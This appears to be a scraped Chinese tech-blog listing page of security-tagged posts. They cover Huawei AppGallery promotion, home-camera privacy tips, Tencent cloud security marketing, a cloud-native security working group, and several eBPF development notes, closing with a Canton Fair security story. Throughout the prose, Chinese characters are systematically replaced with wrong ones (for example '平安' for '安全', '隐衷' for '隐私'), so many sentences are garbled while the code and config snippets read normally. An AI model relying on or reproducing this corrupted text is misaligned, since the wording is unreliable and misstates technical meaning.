December 30, 2021 · 1 min · jiezi

关于安全:十年陪伴点亮时刻精彩-华为应用市场连接智能世界

最近十年,是挪动互联网疾速崛起的十年,也是智慧利用扭转社会的十年。人人联网之后带来的商业改革和生存便当,是天翻地覆的。在这个过程中,利用市场起到了十分微小的作用,是一个智慧时代的重要推手。很多时候,人们可能领会不到,一个手机的智慧体验,和一个利用散发平台经营的好坏是非亲非故的。明天恰逢华为利用市场十周年庆,华为手机的辉煌,我想很多时候也要归功于十年来默默陪伴的华为利用市场。 平安是智慧之旅的基石很多人都可能意识到,智能手机是开启智慧生存的门路,但大部分人却意识不到,你的智慧之旅是从利用市场开始的。除了你下载APP是从利用市场之外,一个很重要的点就在于,很多新的APP可能是利用市场举荐给你能力看到的,而这兴许就是你智慧生存全新的开始。事实上,很多优良的APP也都是在利用市场的举荐下,逐步火爆成为支流的APP,利用市场的经营,是十分关乎到手机的具体体验的。其实我最早也是国内最大的利用市场之一的经营方,深深晓得其中的不容易,也晓得利用市场的重要性。最根底的一点就是APP的安全性,每天都有大量的APP上架,不仅内容参差不齐,其中蕴含的权限应用甚至恶意程序都是不足为奇,还包含一些仿冒大品牌的APP,常常会误导用户下载,最终导致用户上当受骗,轻则隐衷泄露,重则损失钱财。所以安全性是利用市场的第一道关口,也是保障手机用户体验的重中之重。只不过对于用户而言,对于平安的致力是很难间接领会到的。所以我最初发现,做得好的利用市场实质上都是十分重视平安和隐衷的,比方华为利用市场就有一个“开发者实名认证”+“独家四重检测”+“下载安装保障”+“运行防护机制”的全方位平安保障体系,贯通于利用上架、下载、装置和运行的全流程。一方面保障产品自身没有平安危险,而另一方面则要保障在流程上没有破绽,不会被歹意利用钻了空子。这一点工作做的还是十分粗疏的,也是对正规开发者及用户的一种爱护。而除了根本的APP平安之外,APP内容自身的管控则是一个进阶要求,毕竟不同的用户有不同的需要,在这个方面华为利用市场更是走在了后面,早在2018年就引入了合乎国际标准、关爱儿童成长的分级体系,很早就做了针对未成年人的内容分级,并且十分粗疏的划分了年满3周岁、7周岁、12周岁、16周岁及18周岁五类分级,能够说在这个畛域为行业都建立了一个标杆,让大家对智慧时代的未成年人爱护有了充沛的口头和保障。平安是智慧生存的基石,这也是华为利用市场可能一直发展壮大博得消费者的前提条件,这是消费者看不到的中央,也是付出致力最大的中央,它不仅仅是用户体验的保障,也是开发者可能良性的取得收益并一直成长的保障。 开启更美妙的数字生存华为利用市场的胜利并不简略的是因为用心和平安,更重要的一点还在于它的不断创新和内涵拓展。在最新的产品更新后,我的华为一体机、笔记本也有了本人的PC版本的利用市场,这一个多平台的逾越的做法,带来了更多体验上的统一性。事实上,从手机到平板、从PC到智慧屏等多终端都曾经有了华为利用市场,也都经营得各有特色,这种多平台买通的理念就成为了华为软硬件协同的一个典型体现。而这也为开发者带来了更大的倒退空间,开发者也能够把本人的产品进行多端的适配,让用户能够更好地在各个平台上都无缝的切换应用,以达到更好的用户体验。这一点是过来几年中,不少开发者都疏忽的问题。咱们常常会遇到一些平板上经营手机端的苦楚经验,也常常会吐槽一些不错的手机软件产品为什么不做PC版让大家可能更好地在电脑上应用。一个十分典型的侧面例子就是微信,其手机端、平板端、PC端都有十分不错的定制,让用户在各个平台都用起来十分棘手。我置信这也会成为将来软件产品的一个规范打法和配置。对于华为用户来说,这种买通还有一个重要的意义就是用户层面的买通,只有一个华为帐号,就能够在多端同步应用软件服务,手机上看的视频,平板上、PC上能够接着看,手机上玩的游戏也能够在另一部手机或者平板上间接接着玩。这些润物细无声的一致性体验,都是通过华为利用市场的努力实现的。将来在家电上,各种智能设施上,都会呈现这种跨终端的利用产品,开发者也会在产品的设计伊始就把多端的利用思考进去。这显然会激发开发者拓展数字产品的更多价值和可能,也会为开发者带来可继续倒退的、全场景、全品类的数字商品。而作为这所有的散发平台,华为利用市场显然任重道远,承当着为用户提供更美妙的、高品质智慧生存的重要职责。华为利用市场始终在通过多方面的致力来推动开发者的成长和倒退,比方推出了增长全栈解决方案,帮忙开发者更高效地实现广告投放,也帮忙企业找到更优质的推广渠道。华为利用市场还为开发者提供匠心奖、开发者说、摸索等栏目内容散发渠道,进一步举荐优质利用和游戏,以及设立了多个奖项来激励大家的利用翻新和推广。这些动作都让华为利用市场的生态变得更加沉闷和衰弱,也让用户的称心水平越来越高。 更广大的世界正在关上通过了十年的倒退,基于手机的挪动互联网曾经进入到了一个成熟的阶段,在新的十年中,多平台多终端的万物互联世界正在关上。多元化的硬件产品翻新曾经成为了科技企业的共识,状态越来越丰盛的智能硬件产品纷纷问世,不过在这背地,更高的软件服务要求也变得理所应当。毕竟单纯的硬件是不能满足用户的全副需要的,只有互相买通的各种生态,才是最终智能化的方向和起点。所以从这个角度来说,将来华为利用市场的职责越来越重了,也越来越要害了。毕竟谁能率先抢占这些全新服务的市场,谁就更容易“先入为主”,失去更宽泛的认同。还有一个更重要的责任则是华为在海内市场的攻城拔寨,也是须要华为利用市场的全力撑持的,这是一个更大的挑战。毕竟海内市场绝对于国内来说,更加多元和简单,要思考到不同地区的文化和习惯。如何疏导国内开发者做出更合乎海内文化习惯的产品,如何让海内开发者更好的在华为软硬件平台上入局落地,也是将来华为利用市场须要致力的方向。前段时间华为发布会上说,驰名的华为手表表盘宇航员的开发者取得了1300万的分成。这一点还是十分振奋人心的,毕竟这不是一个重度的APP开发,而是一个绝对轻度的表盘开发,这样一个开发都能够取得如此的收益,足以阐明华为平台上蕴含的商业价值是十分微小的。如何帮忙开发者在更多的平台上挖掘更大的商业价值,我想也是将来十年华为利用市场的重要课题之一,而每一个为华为智慧世界添砖加瓦的开发者,肯定都会失去本人应有的回报。十年是一个周期,也是一个新的开始。软硬一体,服务撑持硬件是大势所趋,置信华为利用市场将会通过本人的不断创新和提高,为用户带来更好的智慧生存体验,也会让华为的智慧数字世界,变得更加精彩。(文章源自公众号:万能的大熊)

December 30, 2021 · 1 min · jiezi

关于安全:实用干货让家用摄像头更安全

一、网络摄像头安全隐患起因1、隐衷数据不仅本人有应用最多的“挪动监控性能”,视频数据根本走设施厂商网络进行存储/转发。隐衷数据通过或留存第三方,平安危险微小 2、隐衷数据透露零碎安全漏洞频发,特地是主打高价的小众厂商,甚至厂家服务器运维治理单薄,非主观因素透露防不胜防 3、用户配置不当小白用户明码简略或应用默认明码,加大暴力破解危险有肯定能力用户,为图便当,路由器上做些端口映射或间接映射公网,摄像头根本裸奔在外网 二、解决思路1、隐衷数据本人把握不必官网提供的云监控、云存储。视频只存储到本地SD卡 2、杜绝透露危险(拔卡类的物理透露不探讨)摄像头齐全局域网化掐断外网间接拜访的口子,即使有破绽或配置不当,“好人”也进不来 3、解决挪动监控问题应用P2P工具进行“内网”--》“内网”的端口映射(不在路由器上映射、不映射到公网)应用官网提供的app 配置局域网摄像头,随时随地平安拜访 三、实操指南(以TP-LINK摄像头为例)1、初始化配置摄像头到货后,第一步须要连贯内网wifi,按官网阐明进行(或自行操作,重点是联内网)摄像头联网后,首先进行明码批改。如果通过注册用户进行设施绑定的,实现上两步后可解绑摄像头,退出app登录 2、让摄像头彻底变成内网摄像头(可选)路由器中配置摄像头上网工夫,这里让它每天只能联网1分钟(家中应用华为路由器,貌似容许上网时间段不能为0),也能够阻断摄像头到厂商域名的网络拜访 3、应用工具进行IPC摄像头端口映射(重点)a、祭出工具举荐应用SG(github.com/lazy-luo/smarGate),次要做手机私网-->家中局域网的P2P映射 b、具体操作步骤官网下载app(目前只反对android/鸿蒙),注册用户(收费)下载SG服务端配置运行到摄像头所在局域网任何设施上,本例应用树莓派进行装置登录app,能够看到方才配置好的树莓派节点,配置好摄像头端口(TP-LINK摄像头HTTP默认80端口,视频端口为8800,192.168结尾的IP为摄像头内网IP)如图这样SG的配置就实现了,通过SG工具已将内网摄像头的80端口映射到手机8000端口,内网摄像头8800视频端口映射到手机8800端口 4、 配置"TP-LINK物联" app(重要)关上"TP-LINK物联" app,不必登录。找到“我的”->“设施治理”->"局域网设施"->"增加局域网设施"->“手动增加”。如图在“手动增加”页面输出咱们方才映射到手机上的HTTP端口(8000),为了让手机切换网络时不必改这里的配置,咱们将IP配置成127.0.0.1 ,另外视频端口没有配置的中央,默认是8800,因而手机映射时必须是8800。配置好后如下图 四、成果展现 五、总结&留神SG客户端须要设置后盾运行权限,且放弃运行SG客户端看到绿色的色彩条就代表是P2P的触类旁通其它局域网的服务都能够通过相似的形式进行平安拜访

December 29, 2021 · 1 min · jiezi

关于安全:蝉联第一腾讯稳居中国云主机安全市场领导者

12月22日,寰球驰名企业增长征询公司沙利文联结中国当先行业钻研大数据库头豹研究院公布了《2021年中国云主机市场平安报告》 (以下简称《报告》)。腾讯云主机平安位居竞争者象限并在增长指数、翻新指数两大指数蝉联第一,充分体现了腾讯平安在云主机平安畛域的竞争实力。 报告针对中国云主机威逼、市场定位、发展趋势、竞争态势进行全面剖析,仅5家企业入围产品竞争体现领导者象限,腾讯云主机平安位居领导者梯队。 01危险裸露点集中云主机资产整体威逼仍需重点防护《报告》剖析,2020年至2021年,云端主机平安危险裸露点仍旧集中在谬误平安配置(操作系统及利用)、各类破绽(毁坏零碎之间平安隔离)、零碎弱口令(暴力破解威逼)三个方面。而云主机层面的安全事件集中体现为数据泄露、企业外围网络入侵、歹意挖矿、病毒植入和勒索、外围网页木马等模式。 02预防→进攻→检测→响应腾讯云主机平安闭环资产防护腾讯云主机平安反对混合云部署,聚焦主机资产平安防护,为企业构建“预防→进攻→检测→响应”的整体平安防护体系,提供入侵检测、破绽进攻、等保合规、挖矿及勒索场景防护等场景的解决方案。 【场景一】黑客入侵检测 基于腾讯海量威逼情报库和自研检测引擎,对黑客的入侵行为进行实时的检测及预警。 【场景二】破绽进攻 集成“犀引擎”能力,减少12万+ Linux软件破绽库,反对Linxu软件破绽、Windows系统漏洞、Web-CMS、利用破绽、应急破绽类型破绽分钟级检测,提供详尽修复计划。 【场景三】等保合规 提供自动化15种资产指纹盘点,帮忙企业可视化盘点危险资产;反对等保二级、等保三级、弱明码、CIS 基线、腾讯云最佳平安实际等基线检测策略自定义,帮忙用户检测服务器上各项平安配置,预防并收敛危险。 【场景四】挖矿勒索防护 腾讯平安联合百亿样本资源积淀,通过攻防实战验证查杀引擎能力,集成TAV引擎、Binary AI引擎、Cyber-Holmes引擎等多查杀引擎,高效查杀风行挖矿木马、蠕虫病毒、WebShell等歹意文件,实时监控要害目录,并反对一键开启主动隔离防护。 将来,在数字化转型背景推动下,云端资产的盘点追踪、实时防护需应答多变的虚拟环境威逼。腾讯云主机平安也将继续打磨物理机、虚拟机、容器等多状态资产跨云防护能力,帮忙企业一站式防护主机平安,助力云原生平安生态构建。

December 27, 2021 · 1 min · jiezi

关于安全:腾讯牵头成立CSA云原生安全工作组助力标准制定和产业落地

2021年12月21日,CSA召开线上会议,正式发表成立云原生平安工作组,腾讯和绿盟负责联结组长单位,中国工商银行、中国电信、浪潮云等平安技术应用方,深圳国家金融科技测评核心、广州赛宝认证核心等检测机构,深服气、启明星辰、青藤云平安、小佑科技等平安公司为工作组成员。 工作组任命腾讯云原生平安产品总监谢奕智与绿盟科技星云实验室负责人刘文懋负责联席组长,同时发表启动云原生平安测试规范项目组,测试规范项目组在公安三所的领导下,制订云原生平安技术标准,推动行业落地利用。 云原生以其极致的弹性伸缩能力、高效麻利的运维能力、弱小的故障自愈能力迅速成为云计算支流架构,无力撑持了新型基础设施、企业麻利开发经营等场景,极大地开释云计算带来的红利。随着容器、微服务、DevOps等在生产环境中的使用率疾速晋升,云原生技术架构和业务利用带来的平安问题受到高度重视,亟待解决。 CSA云原生平安工作组致力于推动云原生平安技术在中国的规范制订和产业落地,独特发明一个平安便当、单干共赢的网络环境。 工作组将通过相干课题的钻研,理解云原生平安在以后中国的行业倒退现状、厂商的落地计划以及客户的最佳实际,让企业可能更便捷地晋升平安能力,促成整个云原生平安畛域的疾速倒退。工作组将为企业提供云原生平安测试规范、云原生平安倒退白皮书、云原生平安实际指南等,为促成中国在云原生平安畛域的迅速倒退及落地提供建设性指标。 腾讯云在主机平安和容器平安畛域积攒了丰盛的产品和实践经验: 腾讯云主机平安解决方案,基于腾讯平安积攒的海量威逼数据,利用机器学习为企业提供黑客入侵检测和破绽危险预警等平安防护服务,次要包含明码破解拦挡、异地登录揭示、木马文件检测、高危破绽检测等平安性能,解决以后服务器面临的次要网络安全危险,帮忙企业构建服务器平安防护体系,避免数据泄露。 腾讯云容器平安解决方案,联合了腾讯云鼎实验室千万级外围规模云平台容器集群平安的治理教训,为企业提供容器资产治理、镜像平安、运行时入侵检测等平安服务,保障容器从镜像生成、存储到运行时的全生命周期,帮忙企业构建容器平安防护体系。 腾讯云容器平安产品团队也联结腾讯云容器服务TKE首发了《腾讯云容器平安白皮书》,白皮书融汇云鼎实验室专家团队在容器平安畛域的洞察和实际积淀,针对以后容器面临的平安威逼和挑战、容器平安的行业现状、容器平安体系建设等方面做行业内第一次大规模剖析总结,将腾讯云在云原生平安畛域的钻研分享给业界。 将来,CSA云原生平安工作组也将继续致力于推动行业标准、标准的编写制订,施展腾讯平安在云原生平安畛域的技术积攒和实践经验劣势,助力云原生平安生态衰弱倒退。 CSA简介:云平安联盟大中华区(简称“CSA GCR”、“CSA大中华区”) 专一于下一代数字平安的前沿技术规范钻研与产业最佳实际,致力于构建国内网络安全的生态体系,现有成员单位有近200家,集体会员近2万人,专家约500人,是国内驰名产业组织云平安联盟CSA(Cloud Security Alliance)的寰球四大区之一。 CSA大中华区在网络空间平安行业波及全方位的钻研范畴,钻研方向包含但不限于云平安、数据安全、物联网平安、区块链平安、挪动平安、5G平安、可信AI、隐衷爱护、零信赖等,并公布了300多项研究成果。

December 27, 2021 · 1 min · jiezi

关于安全:Perf-Ring-Buffer对比

Perf Buffer惯例用法:struct addrinfo //须要上传给应用层的数据结构{ int ai_flags; /* Input flags. */ int ai_family; /* Protocol family for socket. */ int ai_socktype; /* Socket type. */ int ai_protocol; /* Protocol for socket. */ u32 ai_addrlen; /* Length of socket address. */ // CHANGED from socklen_t struct sockaddr *ai_addr; /* Socket address for socket. */ char *ai_canonname; /* Canonical name for service location. */ struct addrinfo *ai_next; /* Pointer to next in list. */};struct //Perf Map申明{ __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); __uint(key_size, sizeof(int)); __uint(value_size, sizeof(int)); //这里不是 struct addrinfo大小,这里指的是key对应的fd的大小 ***** __uint(max_entries, 1024); //最大 fd 数量,这里能够不设置,在应用层设置,会笼罩这里的值,尽量保障一个cpu对应一个buffer // https://github.com/cilium/ebpf/pull/300 // https://github.com/cilium/ebpf/issues/209 // https://github.com/cilium/ebpf/blob/02ebf28c2b0cd7c2c6aaf56031bc54f4684c5850/map.go 的函数 clampPerfEventArraySize() 外面} events SEC(".maps");SEC("uretprobe/getaddrinfo")int getaddrinfo_return(struct pt_regs *ctx) { ... struct data_t data = {}; //创立栈上构造体,第一次内存拷贝 data.xxx = xxx; //获取须要的数据 bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &data, sizeof(data)); //将栈上构造体复制到Perf Map中,第二次内存拷贝 ... return 0;}总结: 在栈中申请的构造体,此时ebpf verify验证器会限度构造体不能超过512字节,影响性能开发。 ...

December 25, 2021 · 2 min · jiezi

关于安全:eBPF编写避坑指南

0x1:基本概念当应用tracepoint的时候,函数参数如何确认?cat /sys/kernel/debug/tracing/events/syscalls/xxx/format. xxx为要跟踪的函数,在这里有函数参数定义。 0x2:注意事项写构造体的时候肯定要留神内存对齐,避免被编译器优化填充。应用 LLVM 内置的函数做内存操作 #ifndef memset# define memset(dest, chr, n) __builtin_memset((dest), (chr), (n))#endif#ifndef memcpy# define memcpy(dest, src, n) __builtin_memcpy((dest), (src), (n))#endif#ifndef memmove# define memmove(dest, src, n) __builtin_memmove((dest), (src), (n))#endif指针被操作过后,就得再次申明,不然会被禁止拜访 struct iphdr *ip4 = (struct iphdr *) skb->data + ETH_HLEN; //第一次赋值skb_store_bytes(skb, l3_off + offsetof(struct iphdr, saddr), &new_saddr, 4, 0); //skb被操作了 因而ip4的值不可信,此时如果操作ip4会被回绝ip4 = (struct iphdr *) skb->data + ETH_HLEN; //再获取一次if (ip4->protocol == IPPROTO_TCP) { //能力失常应用 // do something}0x3:常见报错R2 min value is negative, either use unsigned or 'var &= const'第二个变量须要保障非负。 逻辑运算0xFFFFFFFF。 ...

December 25, 2021 · 2 min · jiezi

关于安全:Vscode-解决Golang无法跳转到定义

首先,须要装置好 go 插件,插件市场搜寻go,选一个即可装置。 而后,须要装置 go 的工具包。在 vscode 中,输出快捷键:command(ctrl) + shift + p,在弹出的窗口中,输出:go:install/Update Tools,回车后,抉择所有插件(勾一下全选),点击确认,进行装置(设置GOPROXY)。 接下来,在我的项目的 settings.json 文件中增加配置: "go.goroot": "D:\\Go", "go.gopath": "D:\\gopath", //第三方库代码提醒 "go.inferGopath": true, "go.formatTool": "goreturns", //主动实现未导入的包 "go.autocompleteUnimportedPackages": true, "go.gocodePackageLookupMode": "go", "go.gotoSymbol.includeImports": true, "go.docsTool": "gogetdoc", "go.useCodeSnippetsOnFunctionSuggest": true, "go.useCodeSnippetsOnFunctionSuggestWithoutType": true, "go.useLanguageServer": true, "[go]": { "editor.formatOnSave": true, "editor.codeActionsOnSave": { "source.organizeImports": true, }, // Optional: Disable snippets, as they conflict with completion ranking. "editor.snippetSuggestions": "none", },"[go.mod]": { "editor.formatOnSave": true, "editor.codeActionsOnSave": { "source.organizeImports": true, }, },"go.trace.server": "verbose", "gopls": { // Add parameter placeholders when completing a function. "usePlaceholders": false, // If true, enable additional analyses with staticcheck. // Warning: This will significantly increase memory usage. "staticcheck": false, },"go.languageServerFlags": [ "-remote=auto", "-logfile=auto", "-debug=:0", "-rpc.trace", ], 首选项-设置 去掉 Use Language Server ...

December 25, 2021 · 1 min · jiezi

关于安全:CiliumeBPF令人无语的加载机制记录

前段时间编译bpf c文件,都是用的bpf2go这个go包,这个包尽管很不便,然而指定参数比拟艰难, 学习到tracee falco这种大型项目都是通过makefile间接编译bpf代码,因而打算本人写Makefile clang -D__KERNEL__ -D__ASM_SYSREG_H \ -D__BPF_TRACING__ \ -Wunused \ -Wall \ -Wno-frame-address \ -Wno-unused-value \ -Wno-unknown-warning-option \ -Wno-pragma-once-outside-header \ -Wno-pointer-sign \ -Wno-gnu-variable-sized-type-not-at-end \ -Wno-deprecated-declarations \ -Wno-compare-distinct-pointer-types \ -Wno-address-of-packed-member \ -fno-stack-protector \ -fno-jump-tables \ -fno-unwind-tables \ -fno-asynchronous-unwind-tables \ -xc \ -nostdinc \ -I $(LIBBPF_HEADERS)\ -include $(KERN_SRC_PATH)/include/linux/kconfig.h \ -I$(BPF_HEADERS) \ -I$(KERN_SRC_PATH)/include \ -I$(KERN_SRC_PATH)/include/uapi \ -I$(KERN_SRC_PATH)/include/generated \ -I$(KERN_SRC_PATH)/include/generated/uapi \ -I$(KERN_SRC_PATH)/arch/$(linux_arch)/include \ -I$(KERN_SRC_PATH)/arch/$(linux_arch)/include/uapi \ -I$(KERN_SRC_PATH)/arch/$(linux_arch)/include/generated \ -I$(KERN_SRC_PATH)/arch/$(linux_arch)/include/generated/uapi \ -O2 -emit-llvm \ $(BPF_SRC) \ -c -o - | llc -march=bpf -filetype=obj -o $(OUT_BPF)Makefile写起来很简略,生产.o文件也很easy,然而当用cilium/ebpf加载生成的.o文件时,却报错 ...

December 25, 2021 · 1 min · jiezi

关于安全:eBPF代码流程分析

0x1:应用层流程基于Linux kernel source v5.13 1.加载bpf.o文件并解决elf section信息 1.int bpf_object__open(char *path) //参数是bpf.o文件门路 -- __bpf_object__open(const char *path, const void *obj_buf, size_t obj_buf_sz, const struct bpf_object_open_opts *opts)//读取obj文件,解析elf中section信息。 -- obj = bpf_object__new(path, obj_buf, obj_buf_sz, obj_name); //创立并初始化obj构造体 err = bpf_object__elf_init(obj); //读取elf文件 err = err ? : bpf_object__check_endianness(obj); //判断大小端 err = err ? : bpf_object__elf_collect(obj); //读取elf节信息(license / version / maps / .reloc / .text) err = err ? : bpf_object__collect_externs(obj); //读取btf section err = err ? : bpf_object__finalize_btf(obj); //读取须要 btf解决的data section err = err ? : bpf_object__init_maps(obj, opts); //读取map信息(user map / global data map / btf map / kconfig map) err = err ? : bpf_object__collect_relos(obj); //读取重定位信息2.加载obj文件到内核 ...

December 25, 2021 · 4 min · jiezi

关于安全:eBPFAntiRootkit

背景:针对最近几年频繁呈现的通过eBPF进行容器逃逸、rootkit等攻打,须要思考如何收敛服务器ebpf相干权限,避免被黑客利用。 动态计划:宿主机层面:非root用户不赋予CAP_BPF及CAP_SYS_ADMIN 注:3.15 - 5.7 内核不赋予CAP_SYS_ADMIN即可 5.8及当前内核须要同时不存在CAP_BPF及CAP_SYS_ADMIN权限非root用户禁止调用ebpf性能 /proc/sys/kernel/unprivileged_bpf_disabled 设置为1 值为0示意容许非特权用户调用bpf值为1示意禁止非特权用户调用bpf且该值不可再批改,只能重启后批改值为2示意禁止非特权用户调用bpf,能够再次批改为0或1增加签名机制,只有通过签名的ebpf程序才能够加载(参考MTOS热补丁验签机制) 容器层面:seccomp设置禁止bpf零碎调用容器启动时禁止携带privilege参数非root用户不赋予CAP_BPF及CAP_SYS_ADMIN非root用户禁止调用ebpf性能 /proc/sys/kernel/unprivileged_bpf_disabled 设置为1 动静计划:hook bpf / bpf_probe_write_user 等敏感函数,监控主机bpf事件枚举曾经加载的bpf程序及map(此种计划只能针对一般bpf程序,如果bpf程序实现了rootkit对本身进行暗藏,那此种计划就无奈失效)本文由博客一文多发平台 OpenWrite 公布!

December 25, 2021 · 1 min · jiezi

关于安全:Centos-418-eBPF编译环境搭建

背景:本文次要解决centos7 4.18内核零碎eBPF编译环境搭建 流程:1.内核降级对于如何在centos7装置4.18内核,这个网上有大把教程,不再赘述 2.编译套件降级centos7 默认clang llvm版本较低,不辨认-target=bpf命令,因而须要对clang进行降级 GCC降级编译llvm,须要gcc至多为 5.1版本,centos默认装置的是 gcc 4.8.5。yum install centos-release-scl yum install devtoolset-7 以后登陆session失效 scl enable devtoolset-7 bash source /opt/rh/devtoolset-7/enableecho "source /opt/rh/devtoolset-7/enable" >> ~/.bash_profile source /opt/rh/devtoolset-7/enable装置cmakehttps://github.com/Kitware/CMake/releases/download/v3.14.0/cmake-3.14.0.tar.gztar -zxvf cmake-3.14.0.tar.gzcd cmake-3.14.0./bootstrapmakemake install装置clang9 这个步骤十分耗时 预计3+小时git clone https://github.com/llvm/llvm-project.gitcd llvm-projectgit checkout origin/release/9.xmkdir buildcd buildcmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_RTTI=ON -DLLVM_ENABLE_PROJECTS="clang;libcxx;libcxxabi" -G "Unix Makefiles" ../llvmmakemake install3.libbpf库装置libelf zlibyum install -y elfutils-libelf-devel 装置libbpf git clone https://github.com/libbpf/libbpfcd libbpf/srcmakemake install至此,环境搭建实现,欢快的Coding 本文由博客一文多发平台 OpenWrite 公布!

December 25, 2021 · 1 min · jiezi

关于安全:eBPF开发指南

0x1:技术背景bpf:BPF 的全称是 Berkeley Packet Filter,是一个用于过滤(filter)网络报文(packet)的架构。(例如tcpdump),目前称为Cbpf(Classical bpf) Ebpf:eBPF全称 extended BPF,Linux Kernel 3.15 中引入的全新设计, 是对既有BPF架构进行了全面扩大,一方面,反对了更多畛域的利用,比方:内核追踪(Kernel Tracing)、利用性能调优/监控、流控(Traffic Control)等;另一方面,在接口的设计以及易用性上,也有了较大的改良。 eBPF 反对在用户态将 C 语言编写的一小段“内核代码”注入到内核中运行,注入时要先用 llvm 编译失去应用 BPF 指令集的 ELF 文件,而后从 ELF 文件中解析出能够注入内核的局部,最初用 bpf_load_program() 办法实现注入。 用户态程序和注入到内核中的程序通过共用一个位于内核的 eBPF MAP 实现通信。为了避免注入的代码导致内核解体,eBPF 会对注入的代码进行严格查看,回绝不合格的代码的注入。 eBPF prog load的严格的verify机制eBPF拜访内核资源需借助各种eBPF 的helper func,helper func函数能在最坏的状况下保障平安当初,Linux 内核只运行 eBPF,内核会将加载的 cBPF 字节码 通明地转换成 eBPF 再执行0x2:技术比照|优劣 | eBPF | 源码开发 | 热补丁 || :-- | :-- | :--| :-- | | 劣势 | 1.平安,不会引起宕机 2.自主,可控 2.热加载(良好的加载/卸载流程) 3.开启CO-RE后,移植性高,适配量小 4.能够在注入的代码中写入业务逻辑,优化hids性能 5.开发难度低,上手快 | 1.体积小 2.自由度高 3.性能高 4.功能强大 | 1.体积小 2.自由度高 3.性能高 4.热加载,不须要重启 || 毛病 | 1.性能受限(验证器) 2.强依赖于内核版本 3.不反对内核函数调用 4.单函数最大512byte栈空间,通过尾调用扩大到8K 5.性能不如其余两者 |1.须要从新编译内核 2.须要重启业务主机 3.须要开发者相熟内核 4.适配工作量微小 5.netlink上发数据有性能瓶颈 |1.须要开发者相熟内核 2.适配工作量大 ...

December 25, 2021 · 3 min · jiezi

关于安全:eBPF简介

根底概念eBPF是kernel 3.15中引入的全新设计,将原先的BPF倒退成一个指令集更简单、利用范畴更广的“内核虚拟机”。 eBPF反对在用户态将C语言编写的一小段“内核代码”注入到内核中运行,注入时要先用llvm编译失去应用BPF指令集的elf文件,而后从elf文件中解析出能够注入内核的局部,最初用bpf_load_program办法实现注入。 用户态程序和注入到内核中的程序通过共用一个位于内核中map实现通信。为了避免注入的代码导致内核解体,eBPF会对注入的代码进行严格查看,回绝不合格的代码的注入。 DPDK让用户态程序间接解决网络流,bypass掉内核,应用独立的CPU专门干这个事。XDP让灌入网卡的eBPF程序间接解决网络流,bypass掉内核,应用网卡NPU专门干这个事。EBPF是XDP实现的根底,提供一种相似于在应用层编写驱动的能力,容许用户编写一个沙盒程序动静注入到内核中,运行在内核的虚拟机中。咱们利用ebpf绕过内核协定栈进行减速。eBPF 倒退历程1992年:BPF全称Berkeley Packet Filter,诞生初衷提供一种内核中自定义报文过滤的伎俩(类汇编),晋升抓包效率。(tcpdump) 2011年:linux kernel 3.2版本对BPF进行重大改良,引入BPF JIT,使其性能失去大幅晋升。 2014年: linux kernel 3.15版本,BPF扩大成eBPF,其性能领域扩大至:内核跟踪、性能调优、协定栈QoS等方面。与之配套改良包含:扩大BPF ISA指令集、提供高级语言(C)编程伎俩、提供MAP机制、提供Help机制、引入Verifier机制等。 2016年: linux kernel 4.8版本,eBPF反对XDP,进一步拓展该技术在网络畛域的利用。随后Netronome公司提出eBPF硬件卸载计划。 2018年:linux kernel 4.18版本,引入BTF,将内核中BPF对象(Prog/Map)由字节码转换成对立构造对象,这有利于eBPF对象与Kernel版本的配套治理,为eBPF的倒退奠定根底。 2018年: 从kernel 4.20版本开始,eBPF成为内核最沉闷的我的项目之一,新增个性包含:sysctrl hook、flow dissector、struct_ops、lsm hook、ring buffer等。场景范畴笼罩容器、平安、网络、跟踪等。 <font color=red>2020年: 随着btf的引入 CORE的实现大大提高了ebpf的部署难度,简化开发难度。参考自BPF Portability and CO-RE</font> eBPF编译&运行过程 eBPF相干文章&书籍&视频官网 https://ebpf.io/ 书籍 Linux Observability with BPF BPF Performance Tools 视频 高效入门eBPF https://www.bilibili.com/vide... BPF C编程入门 https://www.bilibili.com/vide... Porjecthttps://github.com/xdp-projec... eBPF我的项目 eBPF在网络方面的利用1. 数据包过滤参考高性能ACL 2. 本地socket通信减速利用ebpf sockmap/redirection晋升socket性能 本文由博客一文多发平台 OpenWrite 公布!

December 25, 2021 · 1 min · jiezi

关于安全:广交会激战120小时

编者按 广交会是中国的一张靓丽名片,继续60多年为来自寰球数百个国家和地区的企业提供贸易往来、文化交流的平台。自第127届广交会搬上云端,保障云上广交会平安稳固运行,成为了至关重要的课题。 间断四届零危险零事变的平安守护是如何炼成的?这背地有多少人的默默付出?有哪些鲜为人知的危险与挑战? 让咱们一起走进这个保卫美妙的故事。 Kenty曾经记不清这是本人第几次坐在这间会议室了。 他头一回坐在这儿,还是第127届广交会开始前。起初他所在的重保团队成了中国第一批护航线上广交会的人。 这次的第130届首次尝试线上线下交融办会,用更先进的技术为寰球数万家企业提供更广大的展现和交换舞台。 “广交世界,互利天下”。他明确,他们要守护的早就不止是一个展会。 另一边,团队里的140余名平安专家都收到了一条神秘信息:“兵士集结”。 01鱼和熊掌Kenty是腾讯平安重保团队的一员。如果把广交会的网络安全保障比作一场战斗,他所在的重保团队就是一支策略声援部队,而他则是一名现场顾问。 早在130届广交会揭幕前2个月,他们就投入到了广交会的平安建设中。 很快,这支部队就发现,交融办展将面临新的平安挑战。在新增的线下场景中,场馆网络极容易成为黑客的攻打对象,有近源攻打危险。 项目组针对此危险,将场馆WiFi设置成了实名认证登录,也部署了入侵检测、上网行为治理等设施,一旦黑客动员攻打,就能疾速发现、阻断并溯源反制,及时管制。 看似完满,但Kenty又抛出了对于安全性和易用性均衡的问题。要为了保障业务去做平安,不能一味为了平安而平安。 因而,必须充分考虑境外采购商的网络状况和应用习惯,预留个别存在非凡需要的业务逻辑,适当放开策略。但在放开策略之外,还须要减少措施,增强平安监测的同时保障业务连续性。 “咱们要的是,鱼和熊掌皆可得兼。”Kenty总结到。 02此时有形胜无形“平安后行”刻在了腾讯每一个平安工作者的基因里。Kenty很庆幸127届广交会本人全程参加了。线上广交会是一个从零开始的零碎,给平安后行发明了条件,也为他们这次的工作带来了底气。 对Kenty而言,平安工作更多的是依据业务需要去做解决方案,判断危险点,演练和重保的过程都是一样的,都是从发现问题到解决问题。 “做平安,让人觉察不到才是最大的成就。”Kenty常常说。 Kenty也是整个团队的“定心丸”。把关、协调要害节点,落实分工,对接用户,我的项目制订、执行、把控,甚至是在低压下开解年老队员。他沉闷在各个环节,要保障十拿九稳,一刻都不敢松散。 